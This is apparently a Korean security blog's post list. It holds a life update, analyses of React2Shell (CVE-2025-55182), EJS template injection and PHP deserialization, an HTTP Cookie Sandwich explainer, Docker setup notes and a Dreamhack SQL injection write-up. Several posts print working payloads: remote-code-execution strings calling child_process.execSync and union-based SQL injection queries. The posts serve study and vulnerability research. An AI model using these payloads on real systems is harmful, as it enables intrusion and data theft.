d0r1

근황 겸 라업 작성이 뜸한 이유

d0r1 — Tue, 3 Mar 2026 01:40:39 +0900

최근 이직을 하여, 새로운 업무에 집중하느라 해킹에 조금 끈을 놓은 듯 합니다 ( 핑계 )

위의 사유도 있긴하지만

요즘 약간 LLM로 몇날밤을 고생해서 푼 문제가 딸깍으로 풀리는 모습을 보면서

워게임 푸는 것도 흥미를 잃은 거 같습니다

내가 밤을 새가며 푼 문제의 점수로 유지되던 등수가

하루 밤 사이에 딸깍으로 주르륵 흘러내리는 모습이 참으로 마음 아프더라고요

어떻게 풀었냐고 물어보면

"챗지피티가.."

그래서 사실 워게임을 잠시 손놓아주고, 모바일 공부와 인프라진단 공부를 하고 있습니다

뭐 이것저것 엄청 쓰긴했는데

실제로 실무보면서 도움되는 케이스가 많기도했고

노션에 정리하는게 얼마나 중요한지 다시 한번 느낍니다

앞으로 블로그에 올라갈 글들은 단순 드림핵 워게임보다는 HTB이 될 거 같네요

다들 건강한 2026년 보내시고 즐거운 한해 되시길.

CVE-2025-55182 - React2Shell 취약점 분석

d0r1 — Thu, 18 Dec 2025 17:50:30 +0900

https://www.dailysecu.com/news/articleView.html?idxno=203349

React·Next.js 겨냥한 React2Shell 공격 한국포함 전세계 확산…일부 PoC는 실전 사용 가능 - 데일리시큐

React 기반 웹 애플리케이션을 겨냥한 치명적인 원격코드실행(RCE) 취약점 ‘React2Shell’을 악용한 공격이 빠르게 확산되고 있다. 취약점 공개 이후

www.dailysecu.com

최근 보안판을 가장 뜨겁게 달군 녀석을 분석해보려고 해당 게시글을 작성하게 되었다

개요

CVSS 10.0

가장 최고점을 갖는 CVE가 최근 발급되었다.

해당 취약점은 현재 React2Shell 이라고 불리며, 과거 log4j RCE처럼 입력값이 프레임워크 내부 로직을 통해 자동 처리되며, 개발자 개입 없이 원격 코드 실행으로 이어진다는 점에서 유사하다

이 취약점의 영향 범위는 React 19.x 및 Next.js App Router(Server Actions 사용 환경)로 확인되었으며, 특정 버전 조합에서 재현된다

이는 React Server Component의 안전하지 않은 역직렬화 과정에서 발현된다

해당 취약점은 Flight Payload 역직렬화 과정에서 발생하는 취약점이다

취약점 분석

Next.js는 Next-Action 헤더를 감지하면, Server Action 요청으로 인식하고 이를 처리하기 위해 HTTP Body를 파싱(역직렬화)하는 과정을 거친다.

이 과정의 경우, 프레임워크 내부에서 자동으로 수행되기에 개발자가 어떠한 코드를 작성하지 않았더라도 발현될 수 있다.

해당 취약점에 대한 내용은 PoC를 기반으로 작성된다

https://github.com/l4rm4nd/CVE-2025-55182

GitHub - l4rm4nd/CVE-2025-55182: Docker poc lab for CVE-2025-55182 / CVE-2025-66478 (React2Shell) detection and exploitation

Docker poc lab for CVE-2025-55182 / CVE-2025-66478 (React2Shell) detection and exploitation - l4rm4nd/CVE-2025-55182

github.com

해당 작성자의 PoC을 살펴보면서 취약점을 살펴보자

Next-Action 헤더를 추가하고, 바디에 페이로드를 담아 전달하는 것을 확인할 수 있다.

이를 상세 분석하면 다음과 같다

"then": "$1:__proto__:then",

JavaScript의 비동기처리 메커니즘인 then을 오염시켜 흐름을 조작

"get": "$1:constructor:constructor"

객체의 생성자에 접근하여, 문자열 형태의 코드를 실제 실행 가능한 함수로 변환

"_prefix": "var res=process.mainModule.require('child_process').execSync('id',{'timeout':5000}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${res}`});"

child_process.execSync('id') 를 통해 id 명령어를 실행하고, 이를 res에 저장

res에 저장한 것을 에러 객체의 digest 속성에 담아서, throw를 수행

▶️ next.js에서 NEXT_REDIRECT 에러는 클라이언트로 전달되는 특성이 존재해 이를 통해 명령어 실행결과를 받으려함

이를 순서에 따라 재정리해보자

1. multipart/form-data 형식으로 서버에 요청을 보낸다

2. 요청 값을 서버는 React Server Action 전용 디코더로 파싱하며, 이 과정에서 참조 기반 객체 그래프를 복원한다.

이때 $1, $Q2와 같은 React Flight reference를 통해 서버 메모리상의 객체들을 조작함

3. Flight Payload 재구성 과정에서 사용되는 내부 response 객체의 _prefix 문자열이 Function constructor 경로를 통해 실행되는 지점에 도달한다

4. 임의 코드가 실행되고, 에러메시지 내 실행된 결과가 노출된다

재현

앞선 도커 파일을 통해, 서버를 구축하고 PoC에 맞춰 재현을 수행해보자

실제로 응답 값 내 에러메시지 속에 실행된 명령어의 결과가 노출되는 것을 확인할 수 있었다

지금 내가 테스트한 것은 단순 코드 실행 후 결과 노출이지만

https://asec.ahnlab.com/ko/91526/

React2Shell 취약점(CVE-2025-55182)을 악용한 EtherRAT 악성코드 유포 - ASEC

React2Shell 취약점(CVE-2025-55182)을 악용한 EtherRAT 악성코드 유포 ASEC

asec.ahnlab.com

이를 고도화한 공격이 존재하는 것을 확인할 수 있다

조치 방안

최신 버전으로 업데이트를 수행하면 해당 취약점은 더이상 발현되지 않는다

참고문헌
https://github.com/l4rm4nd/CVE-2025-55182
https://bandal.dev/blog/react-2-shell
http://blog.omoknooni.me/180
https://www.enki.co.kr/media-center/blog/complete-analysis-of-the-react2shell-cve-2025-55182-vulnerability

HTTP Cookie Sandwich

d0r1 — Thu, 4 Sep 2025 09:41:12 +0900

최근 워게임을 풀다가 HTTP Cookie Sandwich라는 흥미로운 공격 기법을 접하게 되었다. 한국어로 정리된 자료가 거의 없어, 기억을 정리할 겸 글로 남겨본다.

HTTP Cookie Sandwich는 공격자가 HttpOnly 속성이 설정된 쿠키를 우회적으로 추출할 수 있는 공격 기법이다.
이는 웹 서버가 쿠키를 파싱하는 과정에서 특수 문자를 포함한 입력을 처리하는 방식의 차이를 악용한다.

현대 웹 브라우저는 RFC 2109 표준을 완전히 지원하지 않지만, 여전히 많은 서버가 이를 지원한다.
공격자는 이를 이용해 서버가 이전 버전 쿠키 파서를 사용하도록 유도할 수 있다.

예를 들어, 쿠키 헤더에 $Version=1을 추가하면 서버는 RFC2109 기반 처리 방식을 따를 수 있다.
또한 쿠키 값은 큰따옴표(") 안에 포함될 경우 특수문자까지 허용되며, $Path와 $Domain 속성을 지정해 응답 쿠키를 변조할 수도 있다.

만약 서버가 $Version=1을 무시한다면, 이는 해당 서버가 RFC2109를 지원하지 않고 단순히 일반 쿠키 처리만 한다는 의미가 된다.

# Version 지정
Cookie: $Version=1; q1="test";

# 특수문자 포함
Cookie: $Version=1; q1="q2 = test";

# Path, Domain
Cookie: $Version=1; q1="test"; $Path="/"; $Domain=test;

다음의 코드를 기반으로 테스트를 진행해보겠다

/set에 방문한 뒤, HttpOnly 속성을 가진 SESSION 쿠키를 생성한 뒤

test라는 이름을 가진 쿠키를 생성한 뒤, /test 엔드포인트에 접근해보면

위와 같이, test의 값을 출력하고 있음을 확인할 수 있다

XSS가 가능하도록 설정해 둔 /xss 포인트에서 document.cookie를 읽어보면

HttpOnly가 설정 된 쿠키는 보이지 않고, test 쿠키만 보임을 확인할 수 있다

해당 속성이 설정 된 경우, 스크립트를 통해 쿠키에 접근할 수 없기 때문이다

Cookie Sandwich를 사용하면, 이를 추출해낼 수 있다

현대 표준에는 큰따옴표는 값을 감쌀 때 허용되며, 몇몇 서버의 경우에는 이를 닫지 않아도 허용해준다

# 이전 버전을 지원하는 경우
Cookie: $Version=1; param1="start; param2=end"
{
    "param1": "start; param2=end"
}


# 이전 버전을 지원하지 않는 경우
Cookie: param1="start; param2=end"
{
    "param1": "start"
}

위의 결과를 살펴보면, 이전 버전을 지원하는 경우,

"가 닫히지 않았기에 param1의 값 내에 param2의 값이 포함된 것을 확인할 수 있으며,

이전 버전을 지원하지 않는 경우에는

"가 닫히지 않은 부분부터는 모두 무시되어, param2의 값이 무시된 것을 확인할 수 있다

이전 버전을 지원하는 경우

param1과 param2 사이의 값이 존재한다면, 이는 param1의 값으로 포함되어 전달된다는 것이다

HTTP Cookie Sandwich는 해당 로직을 이용하여, HttpOnly 속성이 존재하는 Cookie를 추출해낼 수 있다

PoC 찾기가 너무 힘들었어요를 한방에 해결

d0r1 — Wed, 23 Jul 2025 09:10:20 +0900

https://sploitus.com/

Sploitus | Exploits & Tools Search Engine

Sploitus is a convenient central place for identifying the newest exploits and finding attacks that exploit known vulnerabilities. The search engine is also a good resource for finding security and vulnerability discovery tools.

sploitus.com

cve만 알고 있다면, 대부분 PoC가 여기 더더덩~ 하고 등장해줌

[dreamhack] Return to Library

d0r1 — Tue, 15 Jul 2025 13:01:02 +0900

1cf7096a-a1c4-43b4-94ad-645606ad93cf_Return_To_Library_(RTL).pdf

0.42MB

1-day 분석하기 : CVE-2022-29078

d0r1 — Mon, 12 May 2025 16:31:10 +0900

[CVE-2022-29078] EJS Server Side Template Injection 취약점

드림핵 문제 풀다가 마주친 문제

ejs 3.1.6 ~ 3.1.9 까지 발견되는 취약점이라고 한다.

템플릿을 렌더링하여 넘겨줄때에, 아무런 필터링 없이 바로 전달할 때 발생하는 취약점이다.

조금 더 깊게 살펴보자

https://github.com/mde/ejs/blob/main/lib/ejs.js

ejs/lib/ejs.js at main · mde/ejs

Embedded JavaScript templates -- http://ejs.co. Contribute to mde/ejs development by creating an account on GitHub.

github.com

코드를 살펴보면, 다음과 같은 부분에 집중해보면

data에 args.shift의 값이 대입되는 것을 확인할 수 있다.

이를 위의 코드를 따라서, 실제로 시행하였을 때에 변수를 조회해보면

만약, ?data=test 를 넣었을 때, data에 test라는 값이 대입되어있음을 확인해볼 수 있다.

조금 더 코드를 살펴보면

받아온 데이터 중, data.settings의 view options를 viewOpts에 대입하고
이를 opts라는 파라미터에 얕은 복사를 수행하고 있음을 확인할 수 있다.

여기서 data에 대해 아무런 제제가 없기 때문에

settings['view options']를 강제로 삽입하여 내가 원하는 흐름을 이끌어낼 수 있다.

여기서 추가적으로

EJS는 템플릿을 렌더링할 때, JS 코드를 실행해주는 로직이 존재하는데

해당 부분에서 취약점이 터져서, rce가 가능하게 된다.

prepended 변수에 js 코드를 선언한다음, opts.outputFunctionName이 존재한다면

prepended에 있는 js 코드를 opts.outputFunctionName으로 덮어쓴다.

이렇게 되면, 결과적으로 RCE가 터지게 되는 것이다.

이때, opts변수는 settings['view options']의 값을 가져오게 되기에 위에서 우리가 원하는 코드를 삽입한다면

원하는 흐름을 이끌어 낼 수 있게 되는 것이다.

?settings[view options][outputFunctionName]=x;process.mainModule.require('child_process').execSync('실행할 명령어');s

이와 같은 값을 대입하게 되면

결과론적으로, prepended가 아래와 같이 변조되면서

settings[view options][outputFunctionName]=x;process.mainModule.require('child_process').execSync('실행할 명령어');s

->
settings[view options][outputFunctionName]의 값인 x가 넘어감

var x;
process.mainModule.~~~;
s = __append;

내가 원하는 흐름을 이끌 수 있게 된다.

3.1.7 부터는 outputFunctionName에 대한 패치가 진행되어서, 다른 함수를 찾아야한다

(좌) 3.1.6 (우) 3.1.8

예를 들면,, opts를 사용하는 이런애들은 여전히 가능하다는 것

php deserialize 취약점 분석

d0r1 — Wed, 7 May 2025 13:22:04 +0900

요즘 워게임 문제들을 풀다보면 php deserialize (역직렬화)에 관한 문제가 많다

근데, 아직 나는 이 취약점에 대해 자세히 알 지 못하니까, 이에 대해 한번 써보고자 함

PHP Deserialize 취약점

magic method를 이용할 때, 발생하는 취약점

Magic Method?
php에서는 magic method를 이용해서, 없는 method를 호출하고 처리하는 것이 가능
class A
{
}

$a = new A();
$a->foo();
foo() 라는 함수가 없으므로, undefined method A::foo()가 발생

그러나,
class A {
	Public function __call($name, $args){
    	echo "$name $args[0]";
}
"__call"과 같은 magic method 사용 시, $a->foo()에서 foo를 정의하지 않았음에도 foo 함수가 사용된다.

PHP Deserialize 취약점 살펴보기

(object.php)
<?php
    class test{
        public $id='admin';
        public function __destruct() {
            echo 'userid:'.$this->id. '<br/>';
        }
    }
?>


####################################################

(index.php)

<?php
	include 'object.php';	
    	
	$obj = new test();
	unserialize($_GET['input']);
?>

object.php : test라는 객체에 id가 admin으로 저장되어있음. echo를 통해 현재 인스턴스를 출력

index.php : object.php를 inclue하는데 input이라는 파라미터를 통해 값을 불러옴. 그러나 여기서 unserialize 수행됨.

(1) 아무런 값 없이 전달 시 admin 출력

(2) 파일 역직렬화를 통해 id를 변조하여 전달

O:4:"test":1:{s:2:"id";s:4:"test";}

위의 페이로드는 다음과 같음

O        Object
4        Object length ( test -> 4 )
test     class name 
1        object size ( 파라미터 3개 -> 3, 파라미터 1개 -> 1 )
s        string
2        string length
id       string name ( test 클래스의 id 변수 ) 
s        string
test     string name
##########################################################
위의 양식 중 하나라도 틀리면, 작동하지 않으므로 유의해야함

어떻게 보면 정말 쉬운 개념인데

막상 ctf에서 문제로 마주치면 좀 당황스러움

노력부족이지 뭐

writeup 패스워드는 원칙적으로 비공개입니다

d0r1 — Thu, 10 Apr 2025 09:39:48 +0900

방향성이나 힌트가 필요하시다면

_dor1

디코 DM 주세요~

DOCKER를 이용하여, DREAMHACK 환경구성하기

d0r1 — Mon, 7 Apr 2025 13:36:15 +0900

▶️ PC 환경

macbook m1 pro - ubuntu

Distributor ID: Ubuntu
Description: Ubuntu 24.04.1 LTS
Release: 24.04
Codename: noble

▶️ Dockerfile이 있는 디렉터리에서 terminal 실행

▶️ Docker을 통해 이미지 생성

docker build -t [image_name] .

❗Docker image 빌드 중, 아래와 같은 에러 발생 시 대처 방법
=> => # WARNING: Retrying (Retry(total=4, connect=None, read=None, redirect=No
=> => # ne, status=None)) after connection broken by 'NewConnectionError('<pip
=> => # ._vendor.urllib3.connection.HTTPSConnection object at 0xf20ef1b7d730>:
=> => # Failed to establish a new connection: [Errno -3] Temporary failure in
=> => # name resolution')': /simple/flask/
인터넷 연결이 제대로 되지 않아, 생기는 오류로 보임
위와 같이, dns 설정해주는 파일 만들어주고 systemctl restart docker 를 통해, docker 재시작 후 이미지 빌드 다시 시도

▶️ 이미지 빌드 된 거 확인하기

▶️ 이미지 빌드 후, 컨테이너 얹기

docker run -d -p 5000:5000 --name [container_name] [image_name]

▶️ 컨테이너 잘 올라갔나 확인하기

5000:5000을 통해, 터널링

STATUS가 Up이므로, 실행중임을 확인

▶️ Docker 컨테이너 내리기

docker stop [container_name]
docker rm [container_name]

[dreamhack] liteboard

d0r1 — Fri, 4 Apr 2025 14:39:15 +0900

블랙박스 방식의 문제이다

Add Post에 값을 넣고 저장하면, 아래에 리스트 형식으로 저장되며

Search를 통해 keyword 파라미터를 이용하여, 리스트에 저장된 게시글을 불러오는 형식이다.

sql injection을 시도해보았더니, " -> X ' -> 500 Error

test'+and+'1'='1 --> test

test'+and+'1'='2 --> X

참/거짓을 통한 응답 값이 다른 것을 확인하였기에

'를 통한 injection이 가능하다는 것을 확인하였고, 에러가 500으로 넘어가기에 union based sql injection이 가능한지 확인하였다

우선적으로, 컬럼 갯수를 파악해야한다

order by 를 통해, 2개의 컬럼이 반환되고 있음을 파악하였다.

((사진이나 게시글을 불러온다면, 데이터 타입 때문에 3개일수도 있지만, 현재는 단순히 한줄짜리 게시글을 읽어오기에 데이터 타입을 신경쓰지 않았다))

2번째 컬럼에 들어간 값이 나오는 것을 확인하였고

dbms 종류를 파악하여야한다

sqlite_version()을 수행하였을 때, 3.40.1 라는 값이 나오는 것을 통해, 해당 db가 sqlite임을 확인할 수 있었다

union based sql injection을 통해, table정보, column 정보를 확인해보자

(1) table 정보

공격 구문 : ' union select 1, tbl_name from sqlite_master

결과 : README ,posts, sqlite_sequence

(2) column 정보

공격 구문 : ' union select 1, sql from sqlite_master;--

흠 FLAG가 어딨는지 전혀 감을 못잡는 중

README에 있나?

(3) README 데이터 개수 파악하기

공격 구문 : ' union select 1, count(hello) from README;--

결과 : 1

1개네! 그냥 출력하면 될 듯

(4) FLAG 출력하기

그 외의 플래그 출력 내용은 생략,,